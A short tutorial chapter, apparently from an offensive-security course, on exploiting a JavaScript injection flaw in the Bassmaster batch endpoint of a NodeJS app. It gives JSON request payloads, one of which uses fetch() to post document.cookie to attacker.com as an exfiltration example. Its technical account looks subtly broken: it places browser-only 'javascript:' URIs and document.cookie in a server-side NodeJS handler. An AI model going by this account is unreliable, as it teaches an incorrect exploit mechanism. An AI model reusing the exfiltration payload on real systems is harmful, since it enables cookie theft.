Chapter 6 Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability

Chapter 6 - Bassmaster NodeJS Arbitrary JavaScript Injection Vulnerability

Overview

Chapter 6 focuses on an arbitrary JavaScript injection vulnerability found in the Bassmaster plugin of a NodeJS application. This vulnerability allows an attacker to inject and execute arbitrary JavaScript code through the plugin's API.

Getting Started

  • Environment Setup: Set up a NodeJS environment with the Bassmaster plugin installed. Ensure that the plugin version is the one vulnerable to the arbitrary JavaScript injection.
  • Testing Tools: Utilize tools like Postman or cURL for sending HTTP requests to the Bassmaster API and observe responses.

Vulnerability Discovery

  1. Identifying the Vulnerable Endpoint:
    • The vulnerable endpoint is part of the Bassmaster batch processing feature which allows multiple requests to be processed in a single batch.
    • Inspect the API documentation to understand how batch requests are structured and processed.
POST /batch HTTP/1.1 
Host: vulnerable-nodejs-app.com 
Content-Type: application/json  

{
    "requests": [
        {
            "method": "get",
            "path": "/path1"
        },
        {
            "method": "get",
            "path": "/path2"
        }
    ]
}
  1. Testing for JavaScript Execution:
    • Inject JavaScript code into the batched requests to test for improper input handling and execution of script.
    • Use console.log or similar commands to test for execution context.
{
    "requests": [
        {
            "method": "get",
            "path": "/path1"
        },
        {
            "method": "get",
            "path": "javascript:console.log('Injected JS executed');"
        }
    ]
}

Exploiting the Vulnerability

  1. Crafting the Injection Payload:
    • Create a payload that leverages the JavaScript execution environment to perform malicious actions, such as sending data to an attacker-controlled server.
{
    "requests": [
        {
            "method": "get",
            "path": "javascript:fetch('http://attacker.com', { method: 'POST', body: document.cookie });"
        }
    ]
}
  1. Executing the Payload:
    • Send the crafted payload using a tool like Postman to the vulnerable Bassmaster endpoint and observe the behavior.
    • Monitor network traffic to verify if data exfiltration or other unintended actions are performed.

Summary

This chapter explains how to identify and exploit arbitrary JavaScript injection vulnerabilities in NodeJS applications using the Bassmaster plugin. It emphasizes the need for thorough input validation and sanitization in applications that process JavaScript code dynamically.